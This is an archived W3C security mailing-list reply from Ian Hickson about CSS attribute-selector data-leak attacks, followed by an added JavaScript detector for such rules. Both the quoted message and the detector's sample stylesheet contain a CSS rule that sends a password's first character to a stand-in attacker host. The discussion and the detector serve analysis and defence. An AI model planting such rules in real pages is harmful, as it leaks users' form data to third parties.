- From: Ian Hickson <ian@hixie.ch>
- Date: Sun, 6 Dec 2009 06:16:59 +0000 (UTC)
- To: sird@rckc.at
- Cc: public-web-security@w3.org
On Fri, 4 Dec 2009, Eduardo Vela wrote:
>
> I sincerely understand why people want seamless iframes on HTML5.. I
> mean, I've been there.. but sometimes the better way to do something is
> not to do it.
>
> The perfect example are seamless iframes (defined in html5) and CSS3
> selectors.
>
> What I see with those awesome CSS3 selectors such as:
>
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>
> create a new type of XSS attacks, and those are purely CSS based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary
> files from the page WITHOUT the need of JS.

How is the attacker inserting CSS into the page, in this scenario?

I agree that if an attacker can insert CSS into a victim page, that
numerous information retrieval attacks are possible (though not currently
a password attack, as Maciej mentioned). However, this has long been
known, it doesn't seem to be a new problem.

--
Ian Hickson U+1047E )\._.,--....,'``. fL
http://ln.hixie.ch/ U+263A /, _.. \ _\ ;`._ ,.
Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Received on Sunday, 6 December 2009 06:17:31 UTC
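
A defender-side check for the rule shape quoted in the message above, as an added example that is not part of the original thread: it scans a stylesheet (for instance, user-supplied CSS before it is accepted) and flags rules that pair a selector matching on the contents of a `value` attribute with a `url()` load. The function name, the sample stylesheet and the `https://app.example` origin are constructed for illustration.

```javascript
// Added example, not code from the thread. Names and sample data are constructed.

// Attribute selectors that test the *contents* of "value": =, ^=, $=, *=, ~=, |=
// A bare presence test such as [value] reveals nothing about the contents and is ignored.
const VALUE_SELECTOR = /\[\s*value\s*[\^$*~|]?=[^\]]*\]/i;
// url(...) inside a declaration block; group 2 is the target.
const URL_LOAD = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;

function findValueLeakRules(cssText, pageOrigin) {
  const findings = [];
  // Strip comments first so they cannot hide or split a rule.
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  // Simple "selector { declarations }" splitter; this is not a full CSS parser.
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selector = m[1].trim();
    if (!VALUE_SELECTOR.test(selector)) continue;
    for (const u of m[2].matchAll(URL_LOAD)) {
      const target = u[2].trim();
      let external = true; // an unparsable target is treated as external
      try {
        external = new URL(target, pageOrigin).origin !== new URL(pageOrigin).origin;
      } catch (e) { /* keep external = true */ }
      findings.push({ selector, target, external });
    }
  }
  return findings;
}

// Constructed sample stylesheet: the fourth rule is the one quoted in the message.
const SAMPLE_CSS = `
/* constructed sample */
input[type=text] { border: 1px solid #999 }
input[value] { background: url(/img/field.png) }
.logo { background: url(https://cdn.example/logo.png) }
input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
input[value="yes"] { background: url(/img/checked.png) }
`;

for (const f of findValueLeakRules(SAMPLE_CSS, "https://app.example")) {
  console.log(f.external ? "EXTERNAL" : "same-origin", f.selector, "->", f.target);
}
```

A finding marked same-origin still conditions a request on the field's contents, so it is reported rather than dropped; the `external` flag only helps with triage.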